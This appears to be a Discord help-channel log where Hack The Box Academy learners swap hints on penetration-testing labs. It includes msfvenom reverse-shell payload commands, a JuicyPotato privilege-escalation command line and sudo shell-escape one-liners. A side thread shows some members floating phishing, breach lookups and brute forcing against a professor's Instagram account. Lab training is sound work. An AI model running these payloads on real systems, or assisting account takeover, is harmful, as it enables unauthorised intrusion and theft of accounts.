#modules
Ok.. Do U Know Hacking
Bad One
he's pulling your leg. 🙂
Have you figured this? I'm having the same issue.
I tried ~1500 from rockyou via burp intruder but I didn't get the correct one.
I'm not entirely sure that's true 😅
But whatever, I've been wrong before 🙂
Many... many times
the question "I want to be hacker" is funny. Computer skills? Nop. Do I need it? 🙂
Could be a language barrier?
🤷 Anyway, looks like they went off to Academy, and hope they have fun and learn something in the process 🙂
Could be. But the profile smells funny.
👃
Bonus points for weird capitalisation and multiple question marks
oh that part is a bit dumb but you don't need a password for this any word will do
Hmm.. that didn't work for me. I tried the username for the previous question with the qwertyuiop password and got Invalid Login or password
the username you will need for this is the answer for question 1 but you don't need a valid password for that user
even though for RCE that section said we need "a valid username and password"
Yep, that's exactly what I tried. I couldn't log in tho with qwertyuiop as password
i don't think qwertyuiop is the password for that user
I'm not sure I understand then. How do I log in?
oh you don't need to
all you need is a "valid username" not the password
this is basically the example so not that much spoiler (wrong images the first time)
@echo zenith can I dm you?
yes
Got it. It's a bit dumb how it works.
Thank you
especially when the section has this
Exactly. That's what threw me off
Hey Truth, I'm having issues with this as well. Can you DM me the commands you used?
@hazy grotto what is the problem
No.
Hey everyone, I'm stuck on SQLmap essentials - Skills Assessment
I found the attack vector and my sqlmap displayed all the tables within the database however, I am unable to get the contents of the table with the flag.
Give the permission
You need to get RCE to read the flag
Hello! for the AD Enumeration skill assessment 1, can i get some help on how to get the cleartext credentials for another domain user? Thank you.
I'm stuck on Linux Local Privilege Escalation - Skills Assessment flag5 now and I need some help. I think that I should gain root but I don't know how. Use the busctl command that sudo -l gives me?
any suggestion guys?
@lyric mason have you tried https://gtfobins.github.io/
I did but I don't get it. busctl --show-machine !/bin/sh right?
upgrade to tty session before running it
you can use python for it
Since the last time, I have now tried all given SYSTEM CLSIDs on the GitHub and tried compiling my own binary as well for Juicy Potato. Still not getting anywhere. Any help would be much appreciated 🙂 (ref: Windows Privilege Escalation part I)
I was unable to use the method described in this section as well, repeated the process a few times in case i missed something but no luck.. I'll try one of the other techniques now
For that DnsAdmins section I can load and run the DLL, but not as a rev shell; I can, however, make that DLL file run a rev shell
msfvenom -p windows/x64/exec cmd='C:\Users\netadm\reverse.exe' -f dll -o sussy.dll
Using the first CLSID from here https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard worked fine for me with juicypotato
For that you can use the test_clsid.bat script on that tool's GitHub with the CLSID.list and it will test 500+ CLSIDs
Trying this right now. Seems to output 10000, 10001, 10002 and 10003 next to the CLSIDs. Trying with one CLSID from each group didn't get me the shell.
Just to rule out the obvious, would it matter if I am using PowerShell instead of cmd? And does this format of running the payload look correct: .\juicypotato.exe -t * -p "C:\users\public\rev.exe" -l 1337 -c "0C3B05FB-3498-40C3-9C03-4B22D735550C"? I have verified that rev.exe works well on its own to give me a reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=1337 -f dll > benign.dll works also
Yep it did, yep it crashed for me after 2 sec so the auto-migrate didn't have a chance to run
For the CLSIDs I also have the {} thing but not sure if that matters or not, and I think you should be fine on either PowerShell or cmd. After the test script is done it should output a list of usable CLSIDs named result.log
For the CLSIDs in result.log only a few didn't work for me, but just to be sure I copied and used every one of them; you 100% don't need to do this
It's starting to come together a bit. Got result.log and that had the first CLSID from the GitHub link as well. Switched to cmd, just in case. And now the target timed out. brb.
yes you can dm
got it! thank you so much @vital adder and @slim plover!
Hello, I am working on the Academy module "Laudanum, One Webshell To Rule Them All" and am stuck on question 2, "Establish a web shell session with the target using the concepts covered in this section. Submit the full path of the directory you land in. (Format: c:\path\you\land\in)". I have followed all the proper directions but when I try to navigate to the imported config file for the webshell, I get a server error. Can someone help me figure out what I am doing wrong?
which module are on?
Shells & Payloads
Sorry for the delay, my notes were kinda F for this so I have to give that a check, but what exactly is the issue? If you whitelist your IP in the payload and upload that payload you should just get RCE
Also this payload will give you a cmd shell; for the directory use dir
No problem on the delay! And I am at the part where I upload the webshell and get the output URL to access the webshell. So when I use that URL to get to the cmd shell, I get a runtime error
Also I did whitelist my IP
and what url are you trying to access the payload in?
should i blur the url?
yep
||status.inlanefreight.local\files\demo.aspx||
And you still don't know why you have that issue? \ is only for Windows directories; use / on the web
so i did try that as well and i got the same error
I used url//files/demo.aspx
tried that as well
with double /?
yup
try with 1 /
ok one moment
if that still doesn't work restart the target machine
tried both ||http://status.inlanefreight.local/files/demo.aspx|| and|| http://status.inlanefreight.local//files/demo.aspx|| and still received same error
Stupid question, the file you uploaded did you rename it to demo.aspx?
yes, just to be on par with the instructions
under section: Move a copy for Modification
Can you send a screenshot of the error you're getting + did you add your 10.xx.xx.xx ip?
If that doesn't work you can try to upload the file again under a different name
sure thing. one moment while i take screen shot. and yes, i added my ip in the allowedips section
And if that doesn't work you should indeed just reset the target
pm'ed you the screenshot @unreal patio
and ok i can try to reset the target if it doesnt work
Hi, could you give me a nudge on the Shells & Payloads Skills Assessment Host 1? I got all other tasks done, apart from host 1. I can upload a WAR file, but whenever I visit an uploaded Java payload, I get a 500 error and runtime exception :/
@high totem Did you try with an .aspx shell?
No, but you mean package aspx shell into a war file?
Just upload an *.aspx shell directly and browse to it
@high totem I am running into a runtime error as well in that module. I even tried to reset the target with no luck. @unreal patio, I am assuming that module is being a little buggy if others are running into similar issues?
I redid both modules as you two ran into the errors and it worked fine for me
hmm odd, must be user errors then..lol
Wait, Tomcat doesn't accept files other than WAR. Or is there some other exploit to use?
@high totem if you cat /etc/hosts you'll see there is a vhost you can use
ok, got it. Thank you. However right now I don't know which folder the authors wanted. There are a few in C:\Shares 😄
(Format: all lower case)
So it said for the hostname, but it was in capital letters 😄
Stuck on Attacking Common Applications - Skills Assessment I. I got the first 3 questions, but not the 4th.
I have found a vulnerability that allows RCE, but can't read the flag. I can see it with ||dir+\users\administrator\desktop\flag.txt||, but can't read it with type.
Edit: solved! Thanks a lot to @vital adder
Hint: ||note that this is a BLIND command execution||
Hint2: ||not many common system commands and binaries are available. If what you're trying to do doesn't work, try to use another command/binary||
So this part is a bit new to me, but you can actually run all commands with that vuln; only ||(so far I found 2)|| commands will have output, but the rest will still run, so you can still get a rev shell and get the flag. I didn't do that the first time; if you found the other command you can just "get" the flag
The commands look like they're not running for me. I tried to ||download and run a shell with powershell||, but it didn't work
Can I dm you?
sure
can someone help me with the dcsync attack for the AD Enumeration & Attacks - Skills Assessment Part I? thank you
Hello,
I am having an issue with my nmap scan on the Starting Point Tier 1 "Responder". My nmap scan does not return the same ports that are shown in the walkthrough; my scan only returns port 80. This is with the same flags used inside the walkthrough "nmap --min-rate 5000 -sV -p- <host> -o <filelocation>. Any help would be greatly appreciated.
This last question in the DNS footprinting module is driving me insane. I've found FQDNs all the way out to ns.dev.inlanefreight.htb. Anyone have any insights into this impossible scenario?
@waxen barn what is the problem?
@waxen barn Iirc you're supposed to migrate the dev.inlanefreight.htb and it's one of its vhosts..
I've tried the dev.inlanefreight.htb with the IP address provided for the lesson. Is there a different IP I'm supposed to use?
@waxen barn try to brute force the subdomain
I did that with dnsenum.
@waxen barn What command did you use to get ns.dev.inlanefreight.htb?
Did you bruteforce it? or with a transfer?
Brute force w/ the dnsenum tool’s list; IP as provided by HTB to connect w/; dev.inlanefreight.htb. I got ns and mail1 for the subs to .dev
Then you're on the right track
Just the wrong wordlist 😛
/opt/useful/SecLists/Discovery/DNS/fierce-hostlist.txt
Try with that one
Thanks!
It worked! Holy shit, what a headbanger. I’ll never forget DNS enumeration now though, which I guess is part of the point they’re trying to get us to with exercises like this.
Yep that is one of the major values in it all being challenge-based. You actually will remember and develop tangible skills. But there will certainly be struggling and growing pains 🙂
Hello all,
Currently having some trouble with the module Password Attacks - Credential Hunting in Linux. "Examine the target and find out the password of the user Will. Then, submit the password as the answer"
Is the first step to discover Kira's credentials? I have created a mutated list with the LoveYou1 pass included in the hint. I've tried running crackmapexec with the mutated list against Kira's username but am receiving no results. The hint has me a little confused. Should I be making a mutated list out of the hint pass or the password.list included in the resources?
Kira with a mut_password of LoveYou1 should get you in
Will give it a shot, thanks for the tip!
Does it matter which custom.rule or best64.rule to use for the mutation?
custom.rule from the hashcat rule file in Password Mutations should do it
Finally found Will's password in Credential Hunting in Linux. That sure was a grind. Not too bad in hindsight. Let me know if anyone needs guidance
anybody working on footprinting module. I am on smb footprinting and I am a bit stuck.
I need to find out the physical path for a particular share. I expect to use rpcclient but I cannot access it due to NT_STATUS_NOT_FOUND
I tried to use enum4linux with the debug param to check the calls but was not successful in retrieving that information. I'm almost sure that this tool is the suitable tool. But something is wrong.
Can anybody help me? I read the man page but I don't find what I need and - to be honest - some explanations are beyond my knowledge.
@zenith schooner What paths have you tried so far?
I'd suggest you read this forum post https://forum.hackthebox.com/t/what-is-the-full-system-path-of-smb-share-footprinting-academy/257393/18
I find this confusing. Why doesn’t anyone directly address the question? I was looking for SMB format, and google linked this. Why so coy? Why not address the question? How about a link like Naming and referencing shares, directories, files, and metadata - Azure Files | Microsoft Learn ?
If you're still stuck ping me
hello, anyone that can give some help with Firewall and IDS/IPS Evasion - Medium Lab. its driving me nuts
hint ||protocol||
pls don't share that also if you need help with anything you can just ask here
okay thanks
Also that email is pwned in 3 data breaches
So if you haven't changed your password please do that, and you can check what data breaches your email is in on haveibeenpwned.com
Also, if you can't tell, like the last guy that asked how to hack Google and also had this issue, I'm trying to help
hello i am having challenges answering this question
here is it; What is the path to htb-student's home directory?
If you are having an issue or need help with anything in the Academy please add which module and section (even question) you are stuck on
Also that looks like you need to connect to a target machine or it is on the Pwnbox
Yes, what's the command to get the path to htb-student's home directory?
it was not a "read man" situation. I tried pwnbox and rpcclient works as expected. For any unknown reason, my rpcclient on my kali doesn't work (No tcp/ip traffic was detected by tcpdump). Maybe a smb.conf issue. Thanks anyway
So which module is this? Also if you are on the Pwnbox then you are the htb-students user, or if you are connected to a target machine most likely you still are the htb-students user, so run pwd to list your current directory, and ~/ is short for your home directory, so run: pwd ~/
I am on page 5, System Information, Linux Fundamentals
okay thank you i will run this and get back to you
@zenith schooner did you check your VPN connection?
What is the path to the htb-student's mail?
use this
👍
Any hints?
I tried pwd~ and the answer was wrong
and this is the answer i get /home/htb-ac638407
What is the path to htb-student's home directory? anyone pls i am stuck
What happens when someone gets stuck and can't answer a question in the modules?
@supple cape I would look in the module to see if there are any further modules or resources you can do to try and learn a little more about the subject before tackling the assessment
If you are really stuck then take a step back and try to learn some more fundamentals. It's a marathon not a sprint so don't sweat it, everybody gets stuck and everybody started out knowing nothing.
I have been here for about 2 days. Just look at the question on page 5, System Information. I have tried pwd ~ and it keeps failing. I need a mentor. Please look at page 5, System Info, question 2
i will really appreciate it
@supple cape Google is your best friend, I'm sure someone has been stuck running the same command before
tried google and still dont seem to get the right answer still
nobody seems to know it
and funny enough it has no cubes attached to it the question
@supple cape Are you on the Pwnbox still or have you SSH'd into the given IP address? Just took a look at the question and judging from the output you're getting, you're still in the Pwnbox.
i have figured it out now
how do i switch from the pwnbox
I just got done with some stuff, and for this command you can't run just pwd ~, you need to run pwd ~/ because without the / it isn't a directory, hence the error
The last section of the page you're on has info on how to use SSH. Make sure you're connected to the Academy VPN.
thats true i just found out
Also the question needs the home directory of a user (in this case the htb-student user). If you Google for that user's home directory you will most likely get nothing; you have to Google something like "how to get linux user home directory"
Edit: I tried googling that for the first time and the first link shows a great article about this: https://www.linuxshelltips.com/find-user-home-directory-linux/
Also, does anyone know if there's a way to bypass a blacklisted dollar sign character? I'm on a box where I think I need to bypass an underscore, for which I'm using ${LANG:2:1}, but turns out the dollar sign is blacklisted as well.
Ya, been a while since I did this module, but I remember the commands given in the cheat sheet did not work for me. I used the command syntax from this page if I remember correctly and these worked for me: https://www.atmail.com/blog/imap-101-manual-imap-sessions/
Module- password attacks section- Linux pass the ticket
SSH to <I.P> with user "david@inlanefreight.htb" and password "Password2"
Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory.
I can't seem to login with SSH. I suspect it may just be some command syntax error, but the standard ssh format of user@<I.P>:<port> doesn't seem to work. Tried putting the user in quotes and a few other ssh switches like
ssh -l 'david@inlanefreight.htb' -W '10.129.89.17:2222'
ssh david@inlanefreight.htb@10.129.89.17:2222
ssh -J david@10.129.89.17:2222
ssh -J "david@inlanefreight.htb"@10.129.89.17:2222
none seem to work
Footprinting - Medium Lab: There is no "HTB User" in database nor locally. What are they talking about??
I believe it's ssh <USER>@<IP> -p <PORT>
One question, if I am connected remotely, how can I go back without disconnecting from the remote connection?
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
^[
^[
^C
[us-academy-1]─[10.10.14.113]─[htb-ac630938@htb-qj2d5jsi4f]─[~]
[★]$
I press Ctrl+Z and I get disconnected from where I had connected, when what I wanted was to go back
@forest tapir Enumerate the databases. You should see a database with a users table
I'm almost certain ive looked. there but I'll look over once more
i just started expanding everything at one point in desperation
i cannot find it
@chilly nymph Doing Ctrl+Z backgrounds the process. You should then do stty raw -echo; fg. The stty raw -echo will send your input raw to the terminal and the -echo will prevent it from showing you double output. The fg then returns the backgrounded process to the foreground, letting you interact with your shell again
ohh ty ñ.ñ
I'll write it down
Yeah, there is no "HTB" user:
I've expanded everything.
I'm not expanding "System Stored Procedures". It's becoming ridiculous.
The Select * from master.sys.database_principals was supposed to dump all users anyway, according to microsoft
I don't know wtf they're talking about....
I've gutted this thing. I'm looking through "schemas" at this point...
I've resorted to randomly clicking shit. Idk what else to do.
Is it a shared instance and someone removed it?
a what?
Where you dumped that db from
If it's from an academy module on a machine that is shared between users
And someone did a little joke on you
I dunno haven't done that module but I feel like you should easily find it if you have dumped it all
I thought the machine changed on restart.
I don't know how htb manages these machines.
I'm not sure that "Footprinting" is free or not. No idea.
Would it matter if it was paid?
Tier 0 are considered free, but regardless and especially if it is an ec2 instance it might not be a personal one
That costs money
Again just a guess on my part
Since it shouldn't be some dark arts to find a user
Nah, it's Tier 2
Hmm weird
That's what I'm saying man...
woman, w/e... lol. I'm pissed rn.
I dunno if I have the time today but I'll try and look into it if no-one has the answer for you in the meantime
Lul, idc don't worry (but as professor oak would say, I'm a boy)
Tier 1 boxes and up are private?
I...
It's THM all over again lul
Busted boxes
Worst case scenario open a ticket, but as we're Saturday I don't think you'll find a staff though
It's okay... I guess I'll have to wait.
There is no goddamn Pepe Silvia... Half the people in this office have been made up
hello every one
@forest tapir What are the credentials for the machine for the medium lab?
I solved it some time ago but I forgot the credentials want to see if I can get the htb user out
hang on
I'll. dm
got to spin up my VM first
idk why i can't dm you in browser...
I dm'd you, can you read me?
if you finished it then it can't be broken, can it?
I'm waiting for the you're stupid, i found it response
Hey I was wondering if I could get some help with an issue I am having
I am not a cyber security expert at all, I am a machine learning guy, but my professor said if we can hack his fake social media account we get extra credit. My grades are awful right now and I can use any assistance.
Please dm me if anyone can be of assistance
I don't think extra credit works that way, unless you have some sort of idea what you're doing and just need hints.
He is a weird guy. Literally the dude said it would give us extra credit on our midterm and I was baffled that he'd want us to do that... no, like I've literally never hacked a day in my life. I'm studying data science and this is my class on building neural networks.
Sooo yeah this is way out of my ball park
He said something about using brute force and I’m so naive to this part of CS.
i don't think anyone would do it for you. it's unethical.
I figured and that’s what I thought myself I was like he wants us to break the law for extra credit
it's not really breaking the law if he's allowed it (and fake) but solving the riddle for you would be "cheating", therefore unethical
Oh yeah, I'm not asking for anyone to do it for me, but any pointers on where to start would be helpful, like steps or anything. Everything I'm finding online is fake Instagram hacking apps
What kinda blog and login is it?
There are just too many ways of approaching it without intel
And bruteforce.. is well.. bruteish
It’s just a regular old Instagram account
brute forcing is pretty simple
but you would have to learn the tools first
Dude I know I was like this man is getting us all sent to jail for 30 extra points
HTB is about ethical hacking, so I doubt you'll find people over here that are going to try to breach servers where we have no permission to pentest on
he might have spun up a mock social media page he made himself/snagged from GitHub
who knows
That'd be a different story
you can't brute force insta anyway
I mean I found the page on Instagram
Yeah so does he want us to send an email to his personal email pretending to be Instagram and get his login info
He said he made a fake email with it as well
Would it be easier to get into the gmail account and reset the password
Has he given you an url to attack?
Could I find the password in the elements ?
noooo lol
you're not going to break into Instagram trust me
maybe he does mean "phishing" i dunno
It's starting to sound like you have a grudge against someone on instagram and are just spinning a narrative..
those are some strong words
I truly wish I had a social life to have a grudge
Lol
Yeah I’m at a lose with this one so this task is basically impossible right
Loss**
what kind of class is this?
It’s a machine learning class for basic algos
Yeah I know
This is so sus 🤣
if that's his angle
You're not giving us any info to work with either
Maybe you should try another channel seeing this is for academy modules
I appreciate it anyways guys have a good night I’ll do some more googling
I wouldn't do anything unless you can confirm firstly that the account belongs to the teacher & he wants you to attack via a phish and not trying to 'hack instagram' which, you wouldn't be able to do and would land you in hot water
@pulsar coral use his email to see if his password was breached
If he has just created the email then this wont work.
How do I create a fishing email ?
because you're not breaking into Instagram. end of story lol, So he must have a different angle
you'll have to figure that one out
Okay fair
@pulsar coral it means that sometimes his email and password was breached and he did not change the password which may provide easy win
The email he gave you is a new email just for this task?
Just steal his laptop and dump all passwords (?)
Yooooooo
@stuck hull it may work since most people don't know that their password was breached
@unreal patio you are wild man lol
@stuck hull it's a Gmail he made to sign up for this account. I asked a few students that had him before if he used the same information but they said he always makes a new Gmail and Insta account
phishing requires a certain level of creativity/ conniving
@pulsar coral use dehashed to see if his password was breached first before u go with brute forcing
bruteforcing Instagram would get the account locked out
also, yes
maybe, i dunno what this is with "bruteforcing" though or why he said that
What's on the instagram account?
It sound's either like you need to send a phishing email or this is some kind of puzzle.
Hi ! I am on AD Enumeration & Attacks - Skills Assessment Part I
Managed to get shell using PS remote with the SQL user but I can't find the user clean text passwords. I tried mimikatz and lazagne but only got the hashes
can you submit your own passwords to dehashed/haveibeenpwned??
would they accept that?
maybe that's what he did and Crean is on to something...
He literally wants us to get into the account and send him a picture of the only photo on the account. It's private and he won't accept my friend request
I will give all of this a try
he either A: doesn't understand how security works. B: is being "obtuse" with his instructions, on purpose or C: this is a lie.
js, those are the possibilities
And unless he is just going to email you the password in clear text, you'll have to create a webpage for the phish to be effective - how can he assume ML CS students know how to do that?
It just doesn't make sense
right. it's a bit complicated for a newbie. it's a bit of a task even for experienced pentesters/hackers
unless he just wants you to throw up a quick php page "and just pretend it's pro h4ckzor" and he just wants to see you thinking creatively...
maybe
if i was a teacher, that's what i would want
but it's still a bit of a task, regardless
can i dm someone for Footprinting Lab - Medium?
yup
Well I better get to work this is going to be a longer day than I thought
me or @unreal patio
heh...
Honestly, it seems like a major distraction from the non-trivial task of learning Machine Learning
bin the idea and focus on your course is my advice
Yeah, honestly that's what I'm going to do. This whole project seemed like a waste of time to make. I'm just going to ask my roommate in the morning if he figured it out. Thanks again everyone
Have you tried putting the hashes through Crackstation?
Oh, they'll be salted won't they? nvm
yeh
perhaps if it's permitted
i do think he mentioned "clear text" which i dunno, I'd have to see what's going on with my eyeballs
👀
golden ticket 
perse deh hersh
ermegerd
Yeah the flag is the clear text password :/
I actually finished the lab
Only this flag is missing
the flag is usually plain text..
crackstation is your friend
password or flag?? I'm a bit confused
The cleartext password is the flag
oh right
sounds like mimikatz
Wait you need to be NT in order to dump hashes, right??
I am
hmmm
unless it's something dumb like a file laying in the open, i'm not sure
i've had katz not elevate correctly as a low-priv user before, so that's also possible.
like, sometimes it's finicky at least for me.
maybe i'm just a dum-dum idk
In module Password Attacks - PTT
I'm not allowed to use xfreerdp with .\Administrator as user
Anyone a clue?
hi
administrator as user?
what's ur error msg?
I put . as domain in remmina
Hii friends
Hlo
Hi anyone can tell me my answer
Anybody is daring to give my answer
Weapon of every Hacker
@rustic sage what is the problem
🤦♂️
Hi all, I'm stuck on the "Network Enumeration with Nmap" module, Nmap Scripting Engine section. I've enumerated the ports and ran the 'vuln' script.
It came back with the slow-loris attack, which isn't helpful in this case, the http enum found a robots.txt which looks like it has the flag in it, but won't work when I input it on the site. Any help?
Windows Privilege Escalation: Interacting with Users the hint says ||"Look for interesting shares that are writable by our user."|| but there's only 4 shares, 2 of which are "NO ACCESS" and other 2 are "READ ONLY" 🤔
@stuck hull
A robots.txt file tells search engine crawlers which URLs the crawler can access on your site.
It's a file that is hosted on the webserver
Thanks Niux. I did try just navigating to a url with the contents of the HTB{} but nothing came back.
This is what I'm seeing
that should be the flag i think.. did you try to submit the whole string, with no whitespace?
Under Allow you got your flag
Yea, I tried that but it didn't work.
😛
I've removed the photo for spoilers
Where can I find users and passwords in Microsoft SQL Server Management Studio?
I hate these GUI things and Microsoft also
What module are you working on?
Footprinting Lab - Medium
You have to look for the htb user?
I logged in as admin but I cannot find user HTB and pass
yes
select * from dbo.devsacc where name = 'htb';
Might be too much of a spoiler though
😓
where can i search with this query?
let me see
it says invalid object 😦
select * from accounts where name = 'htb';
And that one?
Strange because I filled in the previous one earlier today and I got the answer
execute but show me nothing
Let me boot up the machine again
select * from accounts.dbo.devsacc where name = 'htb';
Try like that
@sly grotto it worked for me 😐
It worked. Thanks. But how could I know that?
any cheatsheet for mssql?
I got the clue that it wasn't part of the default databases
select * from sys.databases where name not in ('master', 'tempdb', 'model', 'msdb');
So with that command you get the accounts database
And then you enumerate that one
i can't understand this one?
accounts.dbo.devsacc
If you right-click some files you get the option 'Edit Top 200', which is a clue in the module
So if you enumerate all that you can edit the top 200 with a query
you end up getting a hit for htb
In the database accounts there is dbo.devsacc and that is the right file
thank you for your help bro
anyone for web attacks module? XXE Blind Data Exfiltration, just struggling with payload
I have to check it but I don't think so because nmap and smbclient worked. But rpcclient no traffic was generated. I have to check config or a fresh installation. thanks
@zenith schooner are you still stuck?
what channel
is for hack talking
I need some advice on what tools I should really study
and get a firm understanding of
Just make an academy account and start doing the fundamental modules
It's a good place to start
You could start with nmap
already know it
and its a bit trivial
in actual domain hacking
especially when you can use metasploit instead
This is what I'm saying, I don't wanna learn 10 tools when there's 1 that can do all of them in one
Wireshark and burp are also good ones
okay it is about time that I look into wireshark
Do you think learning Lua is worth it for Wireshark and NSE scripts?
ehh
ill figure it out
Hey, question regarding metasploit module, sessions section. I cannot get the elevated permissions. Got the shell, dropped it into background, run local_exploit_suggester to find some exploits and found two. Both say they are completed, but no session was created. Any hints on why this might be? lhost is set to tun0 and lport to 4444 (same as in the first exploit, which is now in session)
Hi, I'm trying to use Impacket's secretsdump script for the password attacks module but running the script produces no output, has anybody encountered this problem before?
@high totem did you specify the right session for the exploits?
Think so. Took the id from the sessions command. Using this id I am able to jump back into the non-elevated shell
You could try to put in your ip by hand instead of tun0
I have had cases where specifying tun0 wasnt enough
try changing lport, maybe the 2 shells are in conflict since you're trying to run them on the same port
@pliant sage which section of password attacks are you in?
attacking SAM
I've retrieved the .save files, but when i run impacket I don't get any output
not even an error message
Changed to 4449 but it didn't help
Unfortunately it didn't help :/
@pliant sage I just used cme there
can you screen the options of the exploit you're using? after setting them
Didn't know I could, was just trying to follow the lessons instruction. I'll give cme a whirl
I used samdump2, worked like a charm
I once ran an exploit twice in a row with no result, spent ages breaking my brain, just to run it a 3rd time and have it work
Your options seem alright
I mean you could try to see if with your current shell you can write files to /tmp but I doubt that's it
/tmp permissions are 0777 :/
I mean, the only thing that bothers me here is that I cannot mark the module as finished because of that. And it is needed for the penetration tester path :/
anyone hack valo or rblx
I run it many times though, with the same result :/
@high totem try to reset the machine and see if the problem persists(?)
or kill the session make a 3rd sesion and try with that
Tried that. It does... I really feel like I tried everything 😛
i didn't use pwnkit for this also i think exploit suggester did give ||CVE-2021-3156|| so try that
MRtom to the rescue! It worked. Thank you. 🙂
However I checked, and exploit suggester did not even try that, so it wasn't suggested
oh that's weird pretty sure i use exploit suggester for this but right now i'm on the enterprise network module so i'll double check that in a bit
@brazen apex Wireshark is not used in hacking but it is analysis tool used to inspect packets on the network
so i just double checked some stuff in that section, and when running exploit suggester against a x86 session you will get a completely different set of exploits than with a x64 session
so a x86 session only gives me ||3|| exploits but the x64 session gives me ||6|| (also i tried ||pwnkit|| manually and this target doesn't seem to be vulnerable)
Ok, so I guess I used the x86 arch (which must have been set as default, as I didn't specify any). I still wonder why any of the exploits I have found didn't create a connection. msfconsole said all of them were successful
yep that's the default
no idea but i have that issue lot
Something to be aware for the future then. Thanks
I connected to pwnbox and I solved it. It was easy. Now I want to figure out why my rpcclient works wrong. 🙂 thanks
@zenith schooner sometimes -N is the problem
General Question: I'm working my way through the 'Firewall and IDS/IPS Evasion' section of Network Enumeration with Nmap. It talks about how IDS and IPS are more difficult to detect on a real pen test and we have to use multiple VPS services. Does it mean things like AWS, Azure & Vultr?
Also, a bad actor wouldn't be able to use those services because when a company inquired their names would be attached to the service - so how do they go about using a VPS?
Any help for a noob?
@cyan saffron what is the problem
im stuck on the question TASK 5
From your scans, what version is FTP running on the target?
how can i know if i can't connect to the target machine?
@cyan saffron did u use nmap to scan the ip address using -v option
no
So scan the ip address using nmap to get the answer
@cyan saffron u can use nmap -p21 -sV -v ip address
Quick question to Password Attacks module. In the introduction it is stated
could require all three types [of authentication] (A CAC [a card], password, and pin from an authenticator app, for example)
Isn't a pin from an authenticator app the same factor as a card? I.e. something you have? Or the same as a password, i.e. something you know. But I don't get how it should be the third one - something you are
Would like to make $500 faster than any other job dm me
How do you report spam on discord?
Dm me
bad actors absolutely can still use vps services. 1. They're criminals, they have no qualms about using stolen identities. 2. Not all VPS providers care or check, some have been known to actively turn a blind eye to malicious actors 3. Some vps providers straight up allow anonymous payment with bitcoin.
Spent considerable time trying to enable windows subsystem for linux in my Windows 11 VM. I think the problem is that I have to enable virtualization in the bios, but it frustrates me because I can't find any virtualization settings in the bios... Any advice?
if you dont have any virtualization settings in your bios you may literally be running a cpu that doesnt support it
I am trying to enable virtualization in a windows VM that is running on my host.
ah virtualization inside of virtualization definitely gets funky, idk how doable it is
Windows subsystem for Linux is supposed to be doable, maybe missed a detail somewhere
can someone help me. im doing the attacking common services easy section, but i cant seem to find a user name. i tried the user name list in resources and tried to auth to rdp, ftp, and the mail with no hits
Stop your ACTIVE machine to change access
where do i check for my active machines?
Error!
You must stop your active machine before spawning another one.
Can I have a hint on resolving "The Live Engagement" section on module "Shells & Payloads"? Im finding it non-sense at all...
i think i just found it
@autumn garnet may enumerate port 25
Hi crean! its good to see you, i think i just found it using a user name list in seclist. also thanks for your help that you gave me last time
@autumn garnet ok
Someone around here?
Hi
@near night hei
@rustic sage What is the problem?
Anyone able to give me a hand getting the Nginx and Apache Reverse Proxy to work with AJP? I'm following the steps in the Server Side Attacks module but my Nginx/Apache instances always fail to connect 😦
hi everyone! Im doing the Web Service & API skills assessment. I have DB access, but cant find the admin password. Kinda confused lol
if anyone can advise I would be forever in your debt
🙂
also grepped through all the node js modules and didnt find anything
wdym have DB access? also hint when you send the right payload to the target machine you will get the admin cred but the target machine only respond if you send the right payload (like the question said)
shoot me a dm if you still need help with that
so i just double checked all 3 after the lab updated and all 3 seem to be working fine now, but the vector hint for the first target is dumb
Ahh thanks mate! I gave up trying to debug my VM, it worked on the Pwnbox 😄
I just don't like using the Pwnbox, it's so laggy for me. Probably cause I'm connecting from Australia :/
yea the pwnbox is a bit laggy but congratz though
Sorry for the oh so late reply but thank you for your help @iron basin
I'm working on the footprinting module SNMP. I ran the SNMPwalk and it wouldn't allow me to scroll very far up in the results. Just stops scrolling at a certain point. Is there something i can do for this?
You could pipe the output via more, e.g. <command> | more, or pipe it out to a file, e.g. <command> | tee -a <file>
Treating outputs as data and programs as processors using pipes is a good skill to have - Linux is nice in that respect, distinct commands with very specific purposes. Combining them can help you achieve many things.
snmpwalk -v2c -c public 10.129.112.42
This is the command i need to run so would it be
snmpwalk -v2c -c public 10.129.112.42 | more
That's right - the command will run and the output shown until it overruns the terminal space.. then you can hit space to continue
I got a root shell and just dropped into the db lol. the creds werent there though :(.
Thank you for teaching me something new.
You're welcome 🙂
is there anyone I can dm about the skills assessment for the web service and api module?
Does anyone know any hacking courses to do?
academy has a lot...
thanks
np
there are learning paths you can follow
they will recommend courses to take
ok thank you, very much but are the courses in the form of videos and exercises?
they are in text, but have interactive exercises you can complete either by joining the VPN or using Pwnbox from your browser
I learn better by practicing, so the interactive exercises help me a lot
some of the exercises are also pretty awesome. I really enjoy the active directory module labs. They simulate a realistic pentest
easily one of the best learning resources out there imo
I also learn better by practicing, but I'll check here and let you know
sounds like HTB academy is for you 🙂
is this part of Pwnbox free?
yep
it is a network joined parrot os box
that you can access through your browser
ok, thanks
there are a lot of introductory modules I think for free
you can try it out and see if it is for you
you just have to make an account
do you already study hacking or do you only do it in your free time?
I have a few certifications and am working on more before seeking employment
got the CRTO OSCP and Pentest+
I've already done some things in the courses, but I learn a part better by watching video too
academy has content for everyone
from beginner to professional
there are pictures in the modules
so I dont think video is necessary
they have screenshots that walk you through the module
and commands issued
I understand, I'll follow what you said, thanks
on another note, does anyone know if I can use sqlmap for the web service & api attacks skills assessment? I thought sqlmap fuzzes the parameters of the XML file, but I can't get it to work
the problem is that i have to translate, because i don't speak english
oh I see. Chrome browser has a translate feature
maybe you can use it to translate the academy text
ok, if you find one let me know
You can change your preferred language in Chrome. Chrome can also translate pages for you.
I only have 30 cubes, can I do something?
there are many 10 cube modules
on the left, there is a "paths" link
cracking into hack the box might be a good place to start
I believe once you complete a module, you get cubes back as well
Academy definitely the place to start, or there are the "Starting Point" categories on https://app.hackthebox.com
How can I put another language in the page?
I completed a module and I didn't win anything. I had 40, spent them buying the module and didn't receive any back, unless I'm wrong
I could be wrong regarding earning cubes by completion to be honest, but that's what I recall. Will check..
I think you're right
anyone can assist on Attacking Common Applications - Skills Assessment I? i have questions 1,2,3. stuck on 4
